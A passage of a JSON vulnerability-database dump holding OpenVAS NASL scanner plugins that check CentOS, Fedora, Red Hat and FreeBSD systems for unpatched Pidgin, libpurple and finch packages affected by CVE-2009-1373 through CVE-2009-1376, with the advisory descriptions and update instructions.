script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"CentOS Security Advisory CESA-2009:1060 (pidgin)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"finch\", rpm:\"finch~2.5.5~3.el5\", rls:\"CentOS5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"finch-devel\", rpm:\"finch-devel~2.5.5~3.el5\", rls:\"CentOS5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpurple\", rpm:\"libpurple~2.5.5~3.el5\", rls:\"CentOS5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpurple-devel\", rpm:\"libpurple-devel~2.5.5~3.el5\", rls:\"CentOS5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpurple-perl\", rpm:\"libpurple-perl~2.5.5~3.el5\", rls:\"CentOS5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpurple-tcl\", rpm:\"libpurple-tcl~2.5.5~3.el5\", rls:\"CentOS5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pidgin\", rpm:\"pidgin~2.5.5~3.el5\", rls:\"CentOS5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pidgin-devel\", rpm:\"pidgin-devel~2.5.5~3.el5\", rls:\"CentOS5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pidgin-perl\", rpm:\"pidgin-perl~2.5.5~3.el5\", rls:\"CentOS5\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-25T10:57:12", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-2927", "CVE-2009-1376", "CVE-2009-1375", "CVE-2009-1374", "CVE-2009-1373"], "description": "The remote host is missing an update to pidgin\nannounced via advisory FEDORA-2009-5597.", "modified": "2017-07-10T00:00:00", "published": "2009-06-05T00:00:00", "id": "OPENVAS:64106", "href": "http://plugins.openvas.org/nasl.php?oid=64106", "type": "openvas", "title": "Fedora Core 10 FEDORA-2009-5597 (pidgin)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_5597.nasl 6624 2017-07-10 06:11:55Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-5597 (pidgin)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Update Information:\n\nThis is a bugfix & security fix release of Pidgin. The full ChangeLog is\navailable at http://developer.pidgin.im/wiki/ChangeLog Details of the\nsecurity fixes included are available at http://www.pidgin.im/news/security/\n\nChangeLog:\n\n* Wed May 20 2009 Stu Tomlinson 2.5.6-1\n- 2.5.6\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. Use \nsu -c 'yum update pidgin' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-5597\";\ntag_summary = \"The remote host is missing an update to pidgin\nannounced via advisory FEDORA-2009-5597.\";\n\n\n\nif(description)\n{\n script_id(64106);\n script_version(\"$Revision: 6624 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:11:55 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-06-05 18:04:08 +0200 (Fri, 05 Jun 2009)\");\n script_cve_id(\"CVE-2009-1373\", \"CVE-2009-1374\", \"CVE-2009-1375\", \"CVE-2009-1376\", \"CVE-2008-2927\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Fedora Core 10 FEDORA-2009-5597 (pidgin)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=500488\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=500490\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=500491\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=500493\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"finch\", rpm:\"finch~2.5.6~1.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"finch-devel\", rpm:\"finch-devel~2.5.6~1.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpurple\", rpm:\"libpurple~2.5.6~1.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpurple-devel\", rpm:\"libpurple-devel~2.5.6~1.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpurple-perl\", rpm:\"libpurple-perl~2.5.6~1.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpurple-tcl\", rpm:\"libpurple-tcl~2.5.6~1.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pidgin\", rpm:\"pidgin~2.5.6~1.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pidgin-devel\", rpm:\"pidgin-devel~2.5.6~1.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pidgin-docs\", rpm:\"pidgin-docs~2.5.6~1.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pidgin-perl\", rpm:\"pidgin-perl~2.5.6~1.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pidgin-debuginfo\", rpm:\"pidgin-debuginfo~2.5.6~1.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:39:31", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-2927", "CVE-2009-1376", "CVE-2009-1375", "CVE-2009-1374", "CVE-2009-1373"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2011-08-09T00:00:00", "id": "OPENVAS:1361412562310880708", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310880708", "type": "openvas", "title": "CentOS Update for finch CESA-2009:1060 centos5 i386", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for finch CESA-2009:1060 centos5 i386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2009-May/015891.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.880708\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2011-08-09 08:20:34 +0200 (Tue, 09 Aug 2011)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"CESA\", value:\"2009:1060\");\n script_cve_id(\"CVE-2009-1373\", \"CVE-2009-1374\", \"CVE-2009-1375\", \"CVE-2009-1376\", \"CVE-2008-2927\");\n script_name(\"CentOS Update for finch CESA-2009:1060 centos5 i386\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'finch'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS5\");\n script_tag(name:\"affected\", value:\"finch on CentOS 5\");\n script_tag(name:\"insight\", value:\"Pidgin is an instant messaging program which can log in to multiple\n accounts on multiple instant messaging networks simultaneously.\n\n A buffer overflow flaw was found in the way Pidgin initiates file transfers\n when using the Extensible Messaging and Presence Protocol (XMPP). If a\n Pidgin client initiates a file transfer, and the remote target sends a\n malformed response, it could cause Pidgin to crash or, potentially, execute\n arbitrary code with the permissions of the user running Pidgin. This flaw\n only affects accounts using XMPP, such as Jabber and Google Talk.\n (CVE-2009-1373)\n\n A denial of service flaw was found in Pidgin's QQ protocol decryption\n handler. When the QQ protocol decrypts packet information, heap data can be\n overwritten, possibly causing Pidgin to crash. (CVE-2009-1374)\n\n A flaw was found in the way Pidgin's PurpleCircBuffer object is expanded.\n If the buffer is full when more data arrives, the data stored in this\n buffer becomes corrupted. This corrupted data could result in confusing or\n misleading data being presented to the user, or possibly crash Pidgin.\n (CVE-2009-1375)\n\n It was discovered that on 32-bit platforms, the Red Hat Security Advisory\n RHSA-2008:0584 provided an incomplete fix for the integer overflow flaw\n affecting Pidgin's MSN protocol handler. If a Pidgin client receives a\n specially-crafted MSN message, it may be possible to execute arbitrary code\n with the permissions of the user running Pidgin. (CVE-2009-1376)\n\n Note: By default, when using an MSN account, only users on your buddy list\n can send you messages. This prevents arbitrary MSN users from exploiting\n this flaw.\n\n All Pidgin users should upgrade to these updated packages, which contain\n backported patches to resolve these issues. Pidgin must be restarted for\n this update to take effect.\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"finch\", rpm:\"finch~2.5.5~3.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"finch-devel\", rpm:\"finch-devel~2.5.5~3.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libpurple\", rpm:\"libpurple~2.5.5~3.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libpurple-devel\", rpm:\"libpurple-devel~2.5.5~3.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libpurple-perl\", rpm:\"libpurple-perl~2.5.5~3.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libpurple-tcl\", rpm:\"libpurple-tcl~2.5.5~3.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"pidgin\", rpm:\"pidgin~2.5.5~3.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"pidgin-devel\", rpm:\"pidgin-devel~2.5.5~3.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"pidgin-perl\", rpm:\"pidgin-perl~2.5.5~3.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-04-06T11:38:03", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-2927", "CVE-2009-1376", "CVE-2009-1375", "CVE-2009-1374", "CVE-2009-1373"], "description": "The remote host is missing updates to Pidgin announced in\nadvisory RHSA-2009:1060.\n\nA buffer overflow flaw was found in the way Pidgin initiates file transfers\nwhen using the Extensible Messaging and Presence Protocol (XMPP). If a\nPidgin client initiates a file transfer, and the remote target sends a\nmalformed response, it could cause Pidgin to crash or, potentially, execute\narbitrary code with the permissions of the user running Pidgin. This flaw\nonly affects accounts using XMPP, such as Jabber and Google Talk.\n(CVE-2009-1373)\n\nA denial of service flaw was found in Pidgin's QQ protocol decryption\nhandler. When the QQ protocol decrypts packet information, heap data can be\noverwritten, possibly causing Pidgin to crash. (CVE-2009-1374)\n\nA flaw was found in the way Pidgin's PurpleCircBuffer object is expanded.\nIf the buffer is full when more data arrives, the data stored in this\nbuffer becomes corrupted. This corrupted data could result in confusing or\nmisleading data being presented to the user, or possibly crash Pidgin.\n(CVE-2009-1375)\n\nIt was discovered that on 32-bit platforms, the Red Hat Security Advisory\nRHSA-2008:0584 provided an incomplete fix for the integer overflow flaw\naffecting Pidgin's MSN protocol handler. If a Pidgin client receives a\nspecially-crafted MSN message, it may be possible to execute arbitrary code\nwith the permissions of the user running Pidgin. (CVE-2009-1376)\n\nNote: By default, when using an MSN account, only users on your buddy list\ncan send you messages. This prevents arbitrary MSN users from exploiting\nthis flaw.\n\nAll Pidgin users should upgrade to these updated packages, which contain\nbackported patches to resolve these issues. Pidgin must be restarted for\nthis update to take effect.", "modified": "2018-04-06T00:00:00", "published": "2009-05-25T00:00:00", "id": "OPENVAS:136141256231064020", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231064020", "type": "openvas", "title": "RedHat Security Advisory RHSA-2009:1060", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: RHSA_2009_1060.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory RHSA-2009:1060 ()\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to Pidgin announced in\nadvisory RHSA-2009:1060.\n\nA buffer overflow flaw was found in the way Pidgin initiates file transfers\nwhen using the Extensible Messaging and Presence Protocol (XMPP). If a\nPidgin client initiates a file transfer, and the remote target sends a\nmalformed response, it could cause Pidgin to crash or, potentially, execute\narbitrary code with the permissions of the user running Pidgin. This flaw\nonly affects accounts using XMPP, such as Jabber and Google Talk.\n(CVE-2009-1373)\n\nA denial of service flaw was found in Pidgin's QQ protocol decryption\nhandler. When the QQ protocol decrypts packet information, heap data can be\noverwritten, possibly causing Pidgin to crash. (CVE-2009-1374)\n\nA flaw was found in the way Pidgin's PurpleCircBuffer object is expanded.\nIf the buffer is full when more data arrives, the data stored in this\nbuffer becomes corrupted. This corrupted data could result in confusing or\nmisleading data being presented to the user, or possibly crash Pidgin.\n(CVE-2009-1375)\n\nIt was discovered that on 32-bit platforms, the Red Hat Security Advisory\nRHSA-2008:0584 provided an incomplete fix for the integer overflow flaw\naffecting Pidgin's MSN protocol handler. If a Pidgin client receives a\nspecially-crafted MSN message, it may be possible to execute arbitrary code\nwith the permissions of the user running Pidgin. (CVE-2009-1376)\n\nNote: By default, when using an MSN account, only users on your buddy list\ncan send you messages. This prevents arbitrary MSN users from exploiting\nthis flaw.\n\nAll Pidgin users should upgrade to these updated packages, which contain\nbackported patches to resolve these issues. Pidgin must be restarted for\nthis update to take effect.\";\n\ntag_solution = \"Please note that this update is available via\nRed Hat Network. To use Red Hat Network, launch the Red\nHat Update Agent with the following command: up2date\";\n\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.64020\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-05-25 20:59:33 +0200 (Mon, 25 May 2009)\");\n script_cve_id(\"CVE-2009-1373\", \"CVE-2009-1374\", \"CVE-2009-1375\", \"CVE-2009-1376\", \"CVE-2008-2927\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"RedHat Security Advisory RHSA-2009:1060\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"http://rhn.redhat.com/errata/RHSA-2009-1060.html\");\n script_xref(name : \"URL\" , value : \"http://www.redhat.com/security/updates/classification/#important\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"finch\", rpm:\"finch~2.5.5~2.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"finch-devel\", rpm:\"finch-devel~2.5.5~2.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpurple\", rpm:\"libpurple~2.5.5~2.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpurple-devel\", rpm:\"libpurple-devel~2.5.5~2.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpurple-perl\", rpm:\"libpurple-perl~2.5.5~2.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpurple-tcl\", rpm:\"libpurple-tcl~2.5.5~2.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pidgin\", rpm:\"pidgin~2.5.5~2.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pidgin-debuginfo\", rpm:\"pidgin-debuginfo~2.5.5~2.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pidgin-devel\", rpm:\"pidgin-devel~2.5.5~2.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pidgin-perl\", rpm:\"pidgin-perl~2.5.5~2.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"finch\", rpm:\"finch~2.5.5~3.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpurple\", rpm:\"libpurple~2.5.5~3.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpurple-perl\", rpm:\"libpurple-perl~2.5.5~3.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpurple-tcl\", rpm:\"libpurple-tcl~2.5.5~3.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pidgin\", rpm:\"pidgin~2.5.5~3.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pidgin-debuginfo\", rpm:\"pidgin-debuginfo~2.5.5~3.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pidgin-perl\", rpm:\"pidgin-perl~2.5.5~3.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"finch-devel\", rpm:\"finch-devel~2.5.5~3.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpurple-devel\", rpm:\"libpurple-devel~2.5.5~3.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pidgin-devel\", rpm:\"pidgin-devel~2.5.5~3.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:38:05", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-2927", "CVE-2009-1376", "CVE-2009-1375", "CVE-2009-1374", "CVE-2009-1373"], "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "modified": "2018-04-06T00:00:00", "published": "2009-06-23T00:00:00", "id": "OPENVAS:136141256231064266", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231064266", "type": "openvas", "title": "FreeBSD Ports: pidgin, libpurple, finch", "sourceData": "#\n#VID b1ca65e6-5aaf-11de-bc9b-0030843d3802\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from VID b1ca65e6-5aaf-11de-bc9b-0030843d3802\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following packages are affected:\n pidgin\n libpurple\n finch\n\nCVE-2009-1373\nBuffer overflow in the XMPP SOCKS5 bytestream server in Pidgin\n(formerly Gaim) before 2.5.6 allows remote authenticated users to\nexecute arbitrary code via vectors involving an outbound XMPP file\ntransfer. NOTE: some of these details are obtained from third party\ninformation.\nCVE-2009-1374\nBuffer overflow in the decrypt_out function in Pidgin (formerly Gaim)\nbefore 2.5.6 allows remote attackers to cause a denial of service\n(application crash) via a QQ packet.\nCVE-2009-1375\nThe PurpleCircBuffer implementation in Pidgin (formerly Gaim) before\n2.5.6 does not properly maintain a certain buffer, which allows remote\nattackers to cause a denial of service (memory corruption and\napplication crash) via vectors involving the (1) XMPP or (2) Sametime\nprotocol.\nCVE-2009-1376\nMultiple integer overflows in the msn_slplink_process_msg functions in\nthe MSN protocol handler in (1) libpurple/protocols/msn/slplink.c and\n(2) libpurple/protocols/msnp9/slplink.c in Pidgin (formerly Gaim)\nbefore 2.5.6 on 32-bit platforms allow remote attackers to execute\narbitrary code via a malformed SLP message with a crafted offset\nvalue, leading to buffer overflows. NOTE: this issue exists because\nof an incomplete fix for CVE-2008-2927.\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\n\nhttp://secunia.com/advisories/35194/\nhttp://www.pidgin.im/news/security/?id=29\nhttp://www.pidgin.im/news/security/?id=30\nhttp://www.pidgin.im/news/security/?id=32\nhttp://www.vuxml.org/freebsd/b1ca65e6-5aaf-11de-bc9b-0030843d3802.html\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.64266\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-06-23 15:49:15 +0200 (Tue, 23 Jun 2009)\");\n script_cve_id(\"CVE-2009-1373\", \"CVE-2009-1374\", \"CVE-2009-1375\", \"CVE-2009-1376\");\n script_bugtraq_id(35067);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"FreeBSD Ports: pidgin, libpurple, finch\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"pidgin\");\nif(!isnull(bver) && revcomp(a:bver, b:\"2.5.6\")<0) {\n txt += 'Package pidgin version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"libpurple\");\nif(!isnull(bver) && revcomp(a:bver, b:\"2.5.6\")<0) {\n txt += 'Package libpurple version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"finch\");\nif(!isnull(bver) && revcomp(a:bver, b:\"2.5.6\")<0) {\n txt += 'Package finch version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 